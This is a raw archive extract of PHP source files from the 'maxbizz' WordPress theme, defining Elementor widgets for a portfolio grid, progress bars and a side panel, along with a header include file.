					]
				],
				'selectors' => [
					'{{WRAPPER}} .project_filters' => 'text-align: {{VALUE}};',
				],
				'default' => '',
			]
		);
		$this->add_responsive_control(
			'filter_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 200,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .project_filters' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'filter_color',
			[
				'label' => __( 'Button Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .project_filters li a' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'filter_hcolor',
			[
				'label' => __( 'Active Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .project_filters li a:hover, {{WRAPPER}} .project_filters li a.selected, {{WRAPPER}} .project_filters li a:before' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'filter_typography',
				'selector' => '{{WRAPPER}} .project_filters li a',
			]
		);
		$this->add_control(
			'count_color',
			[
				'label' => __( 'Count Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .project_filters li a span' => 'color: {{VALUE}};',
				],
				'condition' => [
					'count' => 'yes',
				],
				'separator' => 'before',
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'count_typography',
				'selector' => '{{WRAPPER}} .project_filters li a span',
				'condition' => [
					'count' => 'yes',
				],
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'overlay_style_section',
			[
				'label' => __( 'Project Items', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'heading_general',
			[
				'label' => __( 'General', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'overlay_align',
			[
				'label' => __( 'Alignment Info', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],				
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-info-inner' => 'text-align: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'position',
			[
				'label' => __( 'Position Info', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'default' => 'top',
				'options' => [
					'flex-start' => [
						'title' => __( 'Top', 'maxbizz' ),
						'icon' => 'eicon-v-align-top',
					],
					'center' => [
						'title' => __( 'Middle', 'maxbizz' ),
						'icon' => 'eicon-v-align-middle',
					],
					'flex-end' => [
						'title' => __( 'Bottom', 'maxbizz' ),
						'icon' => 'eicon-v-align-bottom',
					],
				],
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info' => 'align-items: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1'],
				]
			]
		);
		$this->add_control(
			'overlay_background',
			[
				'label' => __( 'Background Overlay', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info, {{WRAPPER}} .style-3 .projects-thumbnail .overlay' => 'background: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-3'],
				]
			]
		);
		$this->add_control(
			'info_background',
			[
				'label' => __( 'Background Info', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .style-2 .portfolio-info-inner' => 'background: {{VALUE}};',
				],
				'condition' => [
					'layout' => 'style-2',
				]
			]
		);
		$this->add_responsive_control(
			'info_padding',
			[
				'label' => 'Padding Info',
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .style-2 .portfolio-info-inner' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
				'condition' => [
					'layout' => 'style-2',
				],
			]
		);
		$this->add_control(
			'scale_thumb',
			[
				'label' => __( 'Animation Image Hover', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);
		$this->add_control(
			'radius_thumb',
			[
				'label' => __( 'Border Radius Image', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .projects-box' => 'border-radius: {{SIZE}}{{UNIT}};',
				],
			]
		);

		/* icon */
		$this->add_control(
			'heading_icon',
			[
				'label' => __( 'Icon Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'layout' => ['style-1','style-3'],
				]
			]
		);
		$this->add_control(
			'show_icon',
			[
				'label' => __( 'Show Button', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'condition' => [
					'layout' => ['style-1','style-3'],
				]
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .plus, {{WRAPPER}} .style-3 .projects-thumbnail i' => 'color: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-3'],
					'show_icon' => 'yes',
				]
			]
		);
		$this->add_control(
			'icon_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .plus, {{WRAPPER}} .style-3 .projects-thumbnail i' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-3'],
					'show_icon' => 'yes',
				]
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_responsive_control(
			'title_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5 a' => 'color: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'title_hcolor',
			[
				'label' => __( 'Hover Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info h5 a:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .projects-box .portfolio-info h5 a',
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);

		/* category */
		$this->add_control(
			'heading_cat',
			[
				'label' => __( 'Category', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'show_cat',
			[
				'label' => __( 'Show Category', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'maxbizz' ),
				'label_off' => __( 'Hide', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
				'condition' => [
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'cat_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates a' => 'color: {{VALUE}}; background-image: linear-gradient(0deg, {{VALUE}}, {{VALUE}});',
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates' => 'color: {{VALUE}};',
				],
				'condition' => [
					'show_cat' => 'yes',
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_control(
			'cat_hcolor',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates a:hover' => 'color: {{VALUE}}; background-image: linear-gradient(0deg, {{VALUE}}, {{VALUE}});',
				],
				'condition' => [
					'show_cat' => 'yes',
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'cat_typography',
				'selector' => '{{WRAPPER}} .projects-box .portfolio-info .portfolio-cates a, {{WRAPPER}} .projects-box .portfolio-info .portfolio-cates span',
				'condition' => [
					'show_cat' => 'yes',
					'layout' => ['style-1','style-2'],
				]
			]
		);
		$this->end_controls_section();	
		
		/* button */
		$this->start_controls_section(
			'style_section',
			[
				'label' => __( 'Load More Button', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
				'condition' => [
					'load_more[value]!' => '',
				]
			]
		);

		$this->add_responsive_control(
			'btn_align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					]
				],
				'selectors' => [
					'{{WRAPPER}} .btn-block' => 'text-align: {{VALUE}};',
				],
				'default' => '',
			]
		);
		$this->add_responsive_control(
			'btn_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->start_controls_tabs( 'tabs_button_style' );

		$this->start_controls_tab(
			'tab_button_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
			]
		);

		$this->add_control(
			'button_text_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'fill: {{VALUE}}; color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'background_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn' => 'background-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_button_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
			]
		);

		$this->add_control(
			'hover_color',
			[
				'label' => __( 'Text Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn:hover, {{WRAPPER}} .octf-btn:focus' => 'color: {{VALUE}};',
				],
			]
		);

		$this->add_control(
			'button_background_hover_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'selectors' => [
					'{{WRAPPER}} .octf-btn:hover, {{WRAPPER}} .octf-btn:focus' => 'background-color: {{VALUE}};',
				],
			]
		);

		$this->end_controls_tab();

		$this->end_controls_tabs();

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<div class="project-filter-wrapper">
			<?php if( 'yes' === $settings['filter'] ) { ?>
	        	<div class="container">
	        		<ul class="project_filters <?php if( 'yes' !== $settings['arrow'] ) echo 'no-arrow'; ?>">
	        			<?php if( $settings['all_text'] != '' ) { ?>
	        			 	<li><a href="#" data-filter="*" class="selected"><?php echo esc_html( $settings['all_text'] ); if( $settings['count'] ) echo '<span class="filter-count"></span>'; ?></a></li>
	        			<?php } ?>
		                <?php
		                if( $settings['project_cat'] ){
		                    $categories = $settings['project_cat'];
		                    foreach( (array)$categories as $categorie){
		                        $cates = get_term_by('term_id', $categorie, 'portfolio_cat');
		                        $cat_name = $cates->name;
		                        $cat_slug = $cates->slug;
		                        $cat_id   = 'category-' . $cates->term_id;

		                ?>
		                	<li>
								<a href='#' data-filter='.<?php echo esc_attr( $cat_id ); ?>'><?php echo esc_html( $cat_name ); if( $settings['count'] ) echo '<span class="filter-count"></span>'; ?></a>
							</li>	                   
		                <?php } }else{
		                    $categories = get_terms('portfolio_cat');
		                    foreach( (array)$categories as $categorie){
		                        $cat_name = $categorie->name;
		                        $cat_slug = $categorie->slug;
		                        $cat_id   = 'category-' . $categorie->term_id;
		                    ?>
		                    <li>
								<a href='#' data-filter='.<?php echo esc_attr( $cat_id ); ?>'><?php echo esc_html( $cat_name ); if( $settings['count'] ) echo '<span class="filter-count"></span>'; ?></a>
							</li>	                    
		                <?php } } ?>
					</ul>
				</div>
	        <?php } ?>
			<?php 
				$cat_ids = '';
	        	if( $settings['project_cat'] ) {
	                $args = array(	                    
	                    'post_type' => 'ot_portfolio',
	                    'post_status' => 'publish',
	                    'tax_query' => array(
	                        array(
	                            'taxonomy' => 'portfolio_cat',
	                            'field' => 'term_id',
	                            'terms' => $settings['project_cat'],
	                        ),
	                    ),              
					);
					$cat_ids = implode(",", $settings['project_cat']);
	            } else {
	                $args = array(
	                    'post_type' => 'ot_portfolio',
	                    'post_status' => 'publish',
	                );
	            }
	            $the_query = new \WP_Query($args);
				$count = $the_query->found_posts;
	        ?>
	        <div class="projects-grid <?php echo $settings['column'].' '.$settings['layout']; if( $settings['popup_thumb'] ) echo ' img-popup'; if( $settings['scale_thumb'] ) echo ' img-scale'; if( !$settings['show_cat'] ) echo ' no-cat'; if( !$settings['show_icon'] ) echo ' no-icon'; ?>" data-load="<?php echo $settings['p_more']; ?>" data-count="<?php echo $count; ?>">
			<div class="grid-sizer"></div>
	            <?php
	            if( $settings['project_cat'] ){
	                $args = array(	                    
	                    'post_type' => 'ot_portfolio',
	                    'post_status' => 'publish',
	                    'posts_per_page' => $settings['project_num'],
	                    'tax_query' => array(
	                        array(
	                            'taxonomy' => 'portfolio_cat',
	                            'field' => 'term_id',
	                            'terms' => $settings['project_cat'],
	                        ),
	                    ),              
	                );
	            }else{
	                $args = array(
	                    'post_type' => 'ot_portfolio',
	                    'post_status' => 'publish',
	                    'posts_per_page' => $settings['project_num'],
	                );
	            }
	            $wp_query = new \WP_Query($args);
	            while ($wp_query -> have_posts()) : $wp_query -> the_post();
				
				if( $settings['style'] == 'p-masonry' ){
					get_template_part( 'template-parts/content', 'project-masonry' );
				}elseif( $settings['style'] == 'p-metro' ){
					get_template_part( 'template-parts/content', 'project-metro' );
				}else{
					get_template_part( 'template-parts/content', 'project' );
				}

	            endwhile; wp_reset_postdata(); ?>
			</div>

			<?php if( $settings['load_more'] && $count >= $settings['project_num'] ) echo '<div class="btn-block"><span class="btn-loadmore octf-btn" data-category="'.$cat_ids.'" data-loaded="'.$settings['load_more'].'" data-loading="'.$settings['loading_more'].'" data-style="'.$settings['style'].'">'.$settings['load_more'].'</span></div>'; ?>
	    </div>
										
	    <?php
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'isotope', 'project', 'grid' ];
	}

	protected function select_param_cate_project() {
		$category = get_terms( 'portfolio_cat' );
		$cat = array();
		foreach( $category as $item ) {
		   if( $item ) {
			  $cat[$item->term_id] = $item->name;
		   }
		}
		return $cat;
	}
}
// After the Schedule class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_PortfolioGrid() );PK�8FZx�@�v&v&/inc/backend/elementor/widgets/progress-bars.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Progress Bars 
 */
class Maxbizz_Progress_Bars extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'iprogress';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Progress Bars', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-skill-bar';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Progress Bars
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
			]
		);

		$this->add_control(
			'bar_style',
			[
				'label' 	=> __( 'Bar Style', 'maxbizz' ),
				'type'  	=> Controls_Manager::SELECT,
				'default' 	=> 'line',
				'options' 	=> [
					'line'    => __( 'Style 1: Line', 'maxbizz' ),
					'circle'  => __( 'Style 2: Circle', 'maxbizz' ),
				]
			]
		);

		$this->add_control(
			'title',
			[
				'label' => 'Title',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Keyword Research', 'maxbizz' ),
			]
		);
		$this->add_control(
			'percent',
			[
				'label' => 'Percentage',
				'type' => Controls_Manager::SLIDER,
				'default' => [
					'size' => 70,
					'unit' => '%',
				],
			]
		);
		$this->add_control(
			'percent_text',
			[
				'label'   => esc_html__( 'Show Percent Text', 'maxbizz' ),
				'type'    => Controls_Manager::SWITCHER,
				'default' => 'yes',
			]
		);
		$this->add_responsive_control(
			'align',
			[
				'label' => __( 'Alignment', 'maxbizz' ),
				'type' => Controls_Manager::CHOOSE,
				'options' => [
					'left'    => [
						'title' => __( 'Left', 'maxbizz' ),
						'icon' => 'eicon-text-align-left',
					],
					'center' => [
						'title' => __( 'Center', 'maxbizz' ),
						'icon' => 'eicon-text-align-center',
					],
					'right' => [
						'title' => __( 'Right', 'maxbizz' ),
						'icon' => 'eicon-text-align-right',
					],
				],
				'selectors' => [
					'{{WRAPPER}}' => 'text-align: {{VALUE}};',
				],
				'condition' => [
					'right_text!' => 'yes',
					'bar_style' => 'circle',
				]
			]
		);

		$this->end_controls_section();

		/* style */
		$this->start_controls_section(
			'bar_style_section',
			[
				'label' => __( 'Progress Bar', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'bar_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .circle-progress .inner-bar' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'bar_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '#ff8523',
				'condition' => [
					'bar_style' => 'circle',
				]
			]
		);
		$this->add_responsive_control(
			'bar_height',
			[
				'label' => __( 'Height', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 20,
					],
				],
				'default' => [
					'size' => 4,
				],
				'condition' => [
					'bar_style' => 'circle',
				]
			]
		);
		$this->add_responsive_control(
			'bar_size',
			[
				'label' => __( 'Circle Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 500,
					],
				],
				'default' => [
					'size' => 160,
				],
				'condition' => [
					'bar_style' => 'circle',
				]
			]
		);
		$this->add_control(
			'lbar_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '#ff8523',
				'selectors' => [
					'{{WRAPPER}} .progress-bar' => 'background: {{VALUE}};',
				],
				'condition' => [
					'bar_style' => 'line',
				]
			]
		);
		$this->add_control(
			'bg_color',
			[
				'label' => __( 'Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .inner-bar:after' => 'border-color: {{VALUE}};',
					'{{WRAPPER}} .iprogress' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_responsive_control(
			'line_height_circle',
			[
				'label' => __( 'Line Height', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .inner-bar:after' => 'border-width: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .iprogress' => 'height: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_line',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .iprogress, {{WRAPPER}} .progress-bar' => 'border-radius: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'bar_style' => 'line',
				]
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_text_section',
			[
				'label' => __( 'Text', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		/* title */
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
			]
		);
		$this->add_responsive_control(
			'title_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .line-progress h6' => 'margin-bottom: {{SIZE}}{{UNIT}};',
					'{{WRAPPER}} .circle-progress h6' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} h6' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} h6',
			]
		);

		/* percentage */
		$this->add_control(
			'heading_percent',
			[
				'label' => __( 'Percent', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'per_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .percent' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'per_bg',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .percent' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'per_typography',
				'selector' => '{{WRAPPER}} .percent',
			]
		);
		$this->add_responsive_control(
			'per_width',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 400,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .percent' => 'width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}; line-height: {{SIZE}}{{UNIT}};',
				],
				'condition' => [
					'bar_style' => 'circle',
				]
			]
		);

		$this->end_controls_section();

	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>

		<?php if( $settings['bar_style'] == 'line' ) { ?>
		<div class="line-progress" data-percent="<?php echo esc_attr( $settings['percent']['size'] ); ?>">
	        <?php if( $settings['title'] ) echo '<h6>' . $settings['title'] . '</h6>'; ?>			
	        <div class="iprogress">
				<div class="progress-bar">
					<?php if( $settings['percent_text'] ) echo '<span class="percent"></span>'; ?>
				</div>
			</div>
	    </div>
		<?php }else{ ?>
		<div class="circle-progress" data-color="<?php echo esc_attr( $settings['bar_color'] ); ?>" data-height="<?php echo esc_attr( $settings['bar_height']['size'] ); ?>" data-size="<?php echo esc_attr( $settings['bar_size']['size'] ); ?>">
			<div class="inner-bar" data-percent="<?php echo esc_attr( $settings['percent']['size'] ); ?>">
				<span>
					<?php if( $settings['percent_text'] ) echo '<span class="percent">' . $settings['percent']['size'] . '</span>'; ?>
				</span>
			</div>
			<?php if( $settings['title'] ) echo '<h6>' . $settings['title'] . '</h6>'; ?>
		</div>
		
	    <?php }
	}

	protected function _content_template() {}

	public function get_keywords() {
		return [ 'circle', 'percent' ];
	}
}
// After the Maxbizz_Progress_Bars class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Progress_Bars() );PK�8FZI���::3inc/backend/elementor/widgets/header/side-panel.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Sidepanel
 */
class Maxbizz_Sidepanel extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'isidepanel';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Side Panel', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-sidebar';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz_header' ];
	}

	protected function _register_controls() {
		
		/*** Style ***/
		$this->start_controls_section(
			'style_icon_section',
			[
				'label' => __( 'Icon', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'icon_color',
			[
				'label' => __( 'Icon Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .panel-btn i' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'icon_size',
			[
				'label' => __( 'Icon Size', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 50,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .panel-btn i:before' => 'font-size: {{SIZE}}{{UNIT}};',
				],
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'style_panel_section',
			[
				'label' => __( 'Side Panel', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_control(
			'panel_size',
			[
				'label' => __( 'Width', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min'  => 100,
						'max'  => 1000,
						'step' => 10,
					],
				],
				'selectors' => [
					'#side-panel' => 'width: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_panel',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'#side-panel' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'bg_close',
			[
				'label' => __( 'Background Close Button', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'#side-panel .side-panel-close' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'color_close',
			[
				'label' => __( 'Color Close Button', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'#side-panel .side-panel-close' => 'color: {{VALUE}};',
				]
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		?>
			
	    	<div class="octf-sidepanel octf-cta-header">
				<div class="site-overlay panel-overlay"></div>
				<div id="panel-btn" class="panel-btn octf-cta-icons">
					<i class="ot-flaticon-menu"></i>
				</div>
			</div>
		    
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Sidepanel class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Sidepanel() );PK�8FZ���yy0inc/backend/elementor/widgets/header/widgets.phpnu�[���<?php

require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/logo.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/menu.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/search.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/side-panel.php' );
require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/menu-mobile.php' );
if ( class_exists( 'woocommerce' ) ) {
    require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/cart.php' );
}PK�8FZ���C��-inc/backend/elementor/widgets/header/cart.phpnu�[���<?php
